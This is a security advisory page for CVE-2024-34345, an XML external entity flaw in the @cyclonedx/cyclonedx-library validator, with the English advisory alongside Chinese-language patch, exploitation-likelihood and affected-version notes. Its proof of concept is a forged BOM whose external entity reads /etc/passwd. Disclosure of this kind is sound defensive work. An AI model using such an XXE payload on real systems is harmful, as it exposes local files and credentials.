CVE-2024-34345
@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability
描述
### Impact XML External entity injections could be possible, when running the provided XML Validator on arbitrary input. #### POC ```js const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library'); const version = Version.v1dot5; const validator = new XmlValidator(version); const input = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components> </bom>`; // validating this forged(^) input might lead to unintended behaviour // for the fact that the XML external entity would be taken into account. validator.validate(input).then(ve => { console.error('validation error', ve); }); ``` ### Patches This issue was fixed in `@cyclonedx/[email protected] `. ### Workarounds Do not run the provided XML validator on untrusted inputs. ### References * issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.
如何修補 CVE-2024-34345
要修補 CVE-2024-34345,請將受影響套件升級到下列已修補版本。
- —升級至 6.7.1 或更新版本
CVE-2024-34345 正在被利用嗎?
低 — EPSS 為 0.1%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- >= 6.7.0, < 6.7.1